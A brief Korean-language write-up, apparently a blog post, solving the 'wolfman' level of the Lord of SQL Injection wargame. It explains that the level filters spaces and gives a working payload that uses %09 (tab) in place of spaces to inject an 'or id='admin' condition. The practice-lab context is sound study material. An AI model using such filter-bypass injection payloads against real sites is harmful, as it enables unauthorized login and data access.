Lord of SQL injection wolfman

생각보다 쉽다. 

 

조건을 보면 id가 admin이어야하고 space bar 즉 공백을 필터링 하는 중이다.

 

여기서 공백은 %09를 입력을 해주면 우회가 가능하다. 

?pw='%09or%09id='admin